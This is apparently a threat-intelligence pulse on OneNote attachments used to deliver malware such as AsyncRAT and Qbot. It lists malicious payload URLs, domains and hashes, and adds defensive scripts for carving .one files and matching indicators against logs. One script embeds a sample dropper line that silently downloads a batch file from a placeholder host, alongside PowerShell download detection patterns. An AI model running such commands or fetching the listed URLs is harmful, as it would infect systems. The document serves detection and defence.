PULSE NAME
OneNote Documents Increasingly Used to Deliver Malware | Proofpoint UK
TLP: WHITE   Adversary: TA577   Author: sbik_intel   Created: 2023-02-01   Modified: 2023-03-03
86 IOCs
Tag: HIGH VOLUME
Proofpoint researchers recently identified an increase in threat actors' use of OneNote documents to deliver malware by email to unsuspecting end users in December 2022 and January 2023. OneNote is a digital notebook created by Microsoft and included in the Microsoft 365 product suite. Proofpoint has observed threat actors deliver malware via OneNote documents (.one files), sent as email attachments or linked from URLs.
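As an added example (not code from the pulse, from Proofpoint or from Microsoft), the script below carves embedded files out of a .one section file using the FileDataStoreObject layout published in Microsoft's MS-ONE specification and flags the payload types the indicators in this pulse point at (.bat, .vbs, .hta, .ps1, .exe, .lnk). The three GUID constants come from that specification; the content sniffers, the constructed sample file and the hypothetical example.invalid URL inside it are assumptions made for the demo.

```python
"""
Carve embedded files out of a OneNote section (.one) file and flag payload
types this pulse's indicators show being dropped (.bat, .vbs, .hta, .ps1,
.exe, .lnk).  Added example, not Proofpoint's or Microsoft's code.  Layout
follows the FileDataStoreObject structure in the public MS-ONE specification;
SAMPLE_ONE is constructed here and is not a real malicious file.
"""
import re
import struct

# GUIDs from MS-ONE, as laid out on disk (first three fields little-endian).
ONE_FILE_HEADER = bytes.fromhex("E4525C7B8CD8A74DAEB15378D02996D3")  # .one guidFileType
FDSO_HEADER = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")      # FileDataStoreObject guidHeader
FDSO_FOOTER = bytes.fromhex("22A7FB710F790B4ABB13899256426B24")      # FileDataStoreObject guidFooter

# Content sniffers, tried in order. A label means "looks executable", not
# "is malicious": a .one file may legitimately embed any of these.
SNIFFERS = [
    ("pe", lambda d: d[:2] == b"MZ"),
    ("lnk", lambda d: d[:4] == b"\x4c\x00\x00\x00"),
    ("hta", lambda d: re.search(rb"<\s*hta:application", d, re.I) is not None),
    ("batch", lambda d: re.match(rb"\s*(@echo|cmd\s*/c|powershell|start\s)", d, re.I) is not None),
    ("vbscript", lambda d: re.search(rb"\bCreateObject\s*\(", d, re.I) is not None),
    ("powershell", lambda d: re.search(rb"Invoke-WebRequest|\bIEX\b|DownloadString|-enc\w*\s", d, re.I) is not None),
]
EXECUTABLE = {label for label, _ in SNIFFERS}


def is_onenote(blob):
    """True when blob starts with the .one section-file GUID."""
    return blob[:16] == ONE_FILE_HEADER


def carve(blob):
    """Return [(offset, data)] for every well-formed FileDataStoreObject in blob."""
    found = []
    pos = 0
    while True:
        pos = blob.find(FDSO_HEADER, pos)
        if pos < 0 or pos + 36 > len(blob):
            break
        # guidHeader(16) cbLength(8, uint64 LE) unused(4) reserved(8) FileData(cbLength) guidFooter(16)
        (cb,) = struct.unpack_from("<Q", blob, pos + 16)
        start, end = pos + 36, pos + 36 + cb
        # Tolerate up to 7 bytes of alignment padding between FileData and the footer.
        fp = blob.find(FDSO_FOOTER, end, end + 8 + len(FDSO_FOOTER))
        if fp >= 0 and fp - end < 8:
            found.append((pos, blob[start:end]))
            pos = fp + len(FDSO_FOOTER)
        else:
            pos += len(FDSO_HEADER)  # bogus length: skip this header and keep scanning
    return found


def classify(data):
    """First sniffer label that matches, else 'other'."""
    for label, test in SNIFFERS:
        if test(data):
            return label
    return "other"


def scan(blob):
    """Describe each embedded object: offset, size, sniffed kind, executable flag."""
    if not is_onenote(blob):
        raise ValueError("not a OneNote section file (bad header GUID)")
    report = []
    for off, data in carve(blob):
        kind = classify(data)
        report.append({"offset": off, "size": len(data), "kind": kind, "executable": kind in EXECUTABLE})
    return report


def build_fdso(data):
    """Wrap data in a FileDataStoreObject (used only to build the constructed sample)."""
    return FDSO_HEADER + struct.pack("<Q", len(data)) + b"\0" * 12 + data + FDSO_FOOTER


# Constructed sample: header GUID, filler, a benign PNG-like blob, then a batch dropper
# of the kind the URLs in this pulse point at (example.invalid is a reserved test name).
SAMPLE_BAT = b'@echo off\r\npowershell -w hidden -c "iwr http://example.invalid/x.bat -o %temp%\\x.bat"\r\n'
SAMPLE_ONE = (
    ONE_FILE_HEADER + b"\0" * 64
    + build_fdso(b"\x89PNG\r\n\x1a\n" + b"\0" * 32)
    + b"\0" * 16
    + build_fdso(SAMPLE_BAT)
)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ONE
    for entry in scan(blob):
        print(entry)
```

Run it against a quarantined attachment with `python carve_one.py Invoice.one`, or with no argument to see the constructed sample. The sniffers are deliberately coarse, so a legitimately embedded script is flagged too; treat the output as triage, and hash the carved payloads so they can be compared against the SHA-256 indicators in the table on this page.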
MITRE ATT&CK & Malware Families
ATT&CK TECHNIQUES: (none listed)
MALWARE FAMILIES: XWorm, Quasar, BEC, AsyncRAT, DOUBLEBACK, OneNote, Qbot
Indicators of Compromise (86)
TYPE   INDICATOR   DESCRIPTION   CREATED
URL http://54.151.95.132/ExcelSheel.vbs 2023-02-01
URL http://54.151.95.132/Access.one 2023-02-01
URL http://3.101.39.145/TPAEROSPACE.one 2023-02-01
URL http://3.101.39.145/Excel.exe 2023-02-01
URL http://files.catbox.moe/rltrtq.bat 2023-02-01
URL http://files.catbox.moe/nvz0g1.ps1 2023-02-01
URL http://transfer.sh/rMitxs/Invoice212.bat 2023-02-01
URL http://transfer.sh/get/p29ViK/tpee.bat 2023-02-01
URL http://transfer.sh/get/cOrt9R/me.bat 2023-02-01
URL http://transfer.sh/get/UaTsxp/Newsharedfilesnow.hta 2023-02-01
URL http://transfer.sh/get/TScdAm/AsyncClient.bat 2023-02-01
URL http://transfer.sh/get/Pcj58k/AsyncClient.bat 2023-02-01
URL http://transfer.sh/get/7msVcM/FRESHME.bat 2023-02-01
URL http://transfer.sh/get/5dLEvB/sky.bat 2023-02-01
URL http://transfer.sh/IGu2K2/INV.bat 2023-02-01
domain direct-trojan.com 2023-02-01
FileHash-MD5 fc54858ae2e48c9dbe562f68107d1928 MD5 of 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
FileHash-SHA1 70352ca74fa8d31d6b1779b56c4fb16834d4e4c6 SHA1 of 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
FileHash-SHA256 0b0c70ee1612139cf7a83847cca805689aec9fbcc587a7ef8f26aa4fb9e71295 2023-02-01
FileHash-SHA256 0ff4aa2eb1cd681e3b77348af935bcfc56f4b7cae48bcd826000b7ff2b82b671 2023-02-01
FileHash-SHA256 15212428deeeabcd5b11a1b8383c654476a3ea1b19b804e4aca606fac285387f 2023-02-01
FileHash-SHA256 1791dd7a7c7d0688fac3626d57221ada157c57572cf9ed46ad4cab3d28dbaf91 2023-02-01
FileHash-SHA256 222b1a425f75fc7998a0bbabd52277cd82bb5ec50b75f4fb67568b3b754f5406 2023-02-01
FileHash-SHA256 2283c3be89eb6cbf0e1579a6e398a5d1f81a50793fcca22fbc6cbdab53dc2d31 2023-02-01
FileHash-SHA256 328a12fdd6b485362befb392925282451d65aa23482584a49dd5b0e126218df7 2023-02-01
FileHash-SHA256 377fe4e55b6dde063c15c41389f3bb5aacf95443874bdcc0d02a44d6bd793780 2023-02-01
FileHash-SHA256 43f4eaefc6e71f8d30b2e3749475af51ce4d6740546706113cc4785b4410a14c 2023-02-01
FileHash-SHA256 66c045eb61f2e589b1e27db284c9c518e5d0e87dcff25b096eede7047f7dd207 2023-02-01
FileHash-SHA256 6a1bac8fbb30f4b98da7f7ac190fb971bf91d15b41748bc63fd9cbddb96ef189 2023-02-01
FileHash-SHA256 73dc35d1fa8d1e3147a5fe6056e01f89847441ec46175ba60b24a56b7fbdf2f9 2023-02-01
FileHash-SHA256 75819879049e80de6376f146430e63a53fc4291d21f3db930ea872b82d07c77a 2023-02-01
FileHash-SHA256 8276104d8d47def986063b8fbafd82ad5f4cd23862ff9ede1231cefb35115a1b 2023-02-01
FileHash-SHA256 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
FileHash-SHA256 a5ae1b866c5d8a7b3eb8427e686cf5d0264b809ed4491b47346542bf69caab65 2023-02-01
FileHash-SHA256 a748f4e526c1a5fed7e57887ef951e451236ee3ad39cf6161d18e5c2230aca0b 2023-02-01
FileHash-SHA256 adb237144a52fc610984bd5ae8501271c5eef8ff49eff0a9d02adf4a5e36ad3b 2023-02-01
FileHash-SHA256 bdc52f8983b7f034e86d1628efab5faf974e8c33ea9c3bcab0fd09ca462f8322 2023-02-01
FileHash-SHA256 c59f95d9c9ff830d33fb73c2a8b0ee8be6619b6823fc23210600b9fa88a8c9d4 2023-02-01
FileHash-SHA256 c8e326756cc1f95ff51ffe26471df16f4131fdbca2ed14f8c8d14e21010058b9 2023-02-01
FileHash-SHA256 de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf 2023-02-01
FileHash-SHA256 dfb8ba6c2ac264ac73f6d2c440d2c0744c043f1d8435bb798fef5380a649fc4e 2023-02-01
FileHash-SHA256 e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e 2023-02-01
FileHash-SHA256 e2b70c8552b38a6b8722d614254202c346190c6a187984a4450223eb536aaf4b 2023-02-01
FileHash-SHA256 e5a33b42b71f8ac1a5371888d11a0066b49a7f0c25fe74857fa07fb0c9bdff27 2023-02-01
FileHash-SHA256 ef5a7fc0c2a301b57f0723af97faea37374b91eb3b72d8ca6ffc09a095998bb2 2023-02-01
URL ftp://ftp.mgcpakistan.com/ 2023-02-01
URL http://109.107.179.248:80 2023-02-01
URL http://179.43.187.241/Downloads/Newsharedfilesnow.pdf.lnk 2023-02-01
URL http://198.23.172.90/comment.exe 2023-02-01
URL http://198.23.172.90/new.exe 2023-02-01
URL http://198.23.172.90/templa.one 2023-02-01
URL http://198.23.172.90/template.one 2023-02-01
URL http://212.193.30.230:3345 2023-02-01
URL http://barricks.org/admin10/client.php 2023-02-01
URL http://codezian.com/Nt57/300123.gif 2023-02-01
URL http://depotejarat.ir/voicemail.bat 2023-02-01
URL http://direct-trojan.com/file/05df70/remlog.bat 2023-02-01
URL http://direct-trojan.com/file/3c6f73/software-update.exe 2023-02-01
URL http://direct-trojan.com/file/b685b9/New%20Section%201.one 2023-02-01
URL http://kanaskanas.com/fw435tv345t.ps1 2023-02-01
URL http://myvigyan.com/m1YPt/300123.gif 2023-02-01
URL http://onenotegem.com/uploads/soft/one-templates/weekly_assignments.one 2023-02-01
URL http://stnicholaschurch.ca/Cardlock_341121.bat 2023-02-01
URL http://stnicholaschurch.ca/DCyaz.bat 2023-02-01
URL http://stnicholaschurch.ca/Invoice.one 2023-02-01
URL http://stnicholaschurch.ca/xw.bat 2023-02-01
URL http://www.onenotegem.com/uploads/soft/one-templates/four-quadrant.one 2023-02-01
URL http://www.onenotegem.com/uploads/soft/one-templates/notes_to_do_list.one 2023-02-01
URL http://www.onenotegem.com/uploads/soft/one-templates/the_daily_schedule.one 2023-02-01
URL http://zaminkaran.ir/new.png 2023-02-01
domain barricks.org 2023-02-01
domain codezian.com 2023-02-01
domain depotejarat.ir 2023-02-01
domain four-quadrant.one 2023-02-01
domain kanaskanas.com 2023-02-01
domain myvigyan.com 2023-02-01
domain onenotegem.com 2023-02-01
domain stnicholaschurch.ca 2023-02-01
domain zaminkaran.ir 2023-02-01
hostname ftp.mgcpakistan.com 2023-02-01
hostname ghcc.duckdns.org 2023-02-01
hostname newtryex.ddns.net 2023-02-01
hostname plax.duckdns.org 2023-02-01
hostname su1d.nerdpol.ovh 2023-02-01
hostname winery.nsupdate.info 2023-02-01
hostname www.onenotegem.com 2023-02-01
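The table above is only useful once it is wired into a lookup. The script below, an added example rather than OTX's or Proofpoint's tooling, parses rows in the pulse's `TYPE INDICATOR ... CREATED` layout and runs them against proxy and endpoint records. The IOC rows are copied from the table; the log format, the records, the subdomain used in them and the confidence labels are assumptions constructed for the demo.

```python
"""
Match this pulse's URL, domain, hostname and file-hash indicators against
proxy and endpoint records.  Added example, not OTX's or Proofpoint's code.
IOC_LINES copies rows from the table; PROXY_LOG and ENDPOINT_EVENTS are
constructed for the demo.
"""
from urllib.parse import urlsplit, unquote

IOC_LINES = """\
URL http://transfer.sh/get/cOrt9R/me.bat 2023-02-01
URL http://direct-trojan.com/file/b685b9/New%20Section%201.one 2023-02-01
domain direct-trojan.com 2023-02-01
domain stnicholaschurch.ca 2023-02-01
hostname plax.duckdns.org 2023-02-01
FileHash-SHA256 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
FileHash-MD5 fc54858ae2e48c9dbe562f68107d1928 MD5 of 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a 2023-02-01
"""

DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}


def normalize_url(url):
    """Comparison form: lower-case scheme/host, default port dropped, path
    percent-decoded, empty path written as '/'."""
    u = urlsplit(url.strip())
    scheme = u.scheme.lower()
    host = (u.hostname or "").lower()
    netloc = host if u.port in (None, DEFAULT_PORTS.get(scheme)) else f"{host}:{u.port}"
    query = f"?{u.query}" if u.query else ""
    return f"{scheme}://{netloc}{unquote(u.path) or '/'}{query}"


def parse_iocs(text):
    """Bucket 'TYPE INDICATOR ... CREATED' rows by how each type is matched."""
    iocs = {"url": set(), "url_host": set(), "domain": set(), "hostname": set(), "hash": set()}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        kind, value = parts[0], parts[1]
        if kind == "URL":
            iocs["url"].add(normalize_url(value))
            host = urlsplit(value).hostname
            if host:
                iocs["url_host"].add(host.lower())
        elif kind in ("domain", "hostname"):
            iocs[kind].add(value.lower())
        elif kind.startswith("FileHash-"):
            iocs["hash"].add(value.lower())
    return iocs


def host_match(host, iocs):
    """'hostname' on exact match, 'domain' on exact or subdomain match, else None."""
    host = host.lower()
    if host in iocs["hostname"]:
        return "hostname"
    for d in iocs["domain"]:
        if host == d or host.endswith("." + d):
            return "domain"
    return None


def match_proxy(lines, iocs):
    """lines are 'ts client method url status'. Returns (confidence, reason, url) per hit."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        url = parts[3]
        host = urlsplit(url).hostname or ""
        why = host_match(host, iocs)
        if normalize_url(url) in iocs["url"]:
            hits.append(("high", "url", url))
        elif why:
            hits.append(("high", why, url))
        elif host.lower() in iocs["url_host"]:
            # Same host as a URL indicator, different path. transfer.sh and
            # catbox.moe in this pulse are shared file hosts, so this is a
            # lead to review, not a verdict.
            hits.append(("review", "url_host", url))
    return hits


def match_hashes(events, iocs):
    """events carry 'host', 'path' and any of md5/sha1/sha256. Returns (host, path, algo)."""
    hits = []
    for ev in events:
        for algo in ("md5", "sha1", "sha256"):
            h = ev.get(algo, "").lower()
            if h and h in iocs["hash"]:
                hits.append((ev["host"], ev["path"], algo))
                break
    return hits


# Constructed records; only the indicator values are from the pulse.
PROXY_LOG = [
    "2023-02-02T10:01:02Z 10.0.0.5 GET http://transfer.sh/get/cOrt9R/me.bat 200",
    "2023-02-02T10:01:09Z 10.0.0.5 GET http://direct-trojan.com/file/b685b9/New%20Section%201.one 200",
    "2023-02-02T10:02:15Z 10.0.0.7 GET http://cdn.stnicholaschurch.ca/xw.bat 404",
    "2023-02-02T10:03:30Z 10.0.0.9 GET http://PLAX.DUCKDNS.ORG:80/ 200",
    "2023-02-02T10:04:00Z 10.0.0.5 GET http://transfer.sh/get/Zz9q1a/report.pdf 200",
    "2023-02-02T10:05:12Z 10.0.0.8 GET https://www.example.com/index.html 200",
]
ENDPOINT_EVENTS = [
    {"host": "WS-0411", "path": "C:/Users/a/Downloads/Invoice.one",
     "sha256": "9BF99FC32DC69F213812C3C747E8DD41FEF63AD0FD0AEC01A6B399AEB10A166A"},
    {"host": "WS-0412", "path": "C:/Users/b/Downloads/notes.one",
     "md5": "d41d8cd98f00b204e9800998ecf8427e"},
]

if __name__ == "__main__":
    iocs = parse_iocs(IOC_LINES)
    for hit in match_proxy(PROXY_LOG, iocs) + match_hashes(ENDPOINT_EVENTS, iocs):
        print(hit)
```

URL indicators are compared after normalisation (case, default port, percent-encoding), domain indicators match their subdomains, and hostname indicators match exactly, which matters for the dynamic-DNS hosts (duckdns.org, ddns.net, nsupdate.info) where the parent domain is shared by many unrelated users. A host that only appears inside a URL indicator (transfer.sh, files.catbox.moe) is reported for review rather than as a hit, because those are shared file-hosting services. When loading the full table, note that `four-quadrant.one` in the domain list matches the file name in one of the onenotegem.com template URLs rather than any host that would be seen in traffic, so it is worth dropping before use.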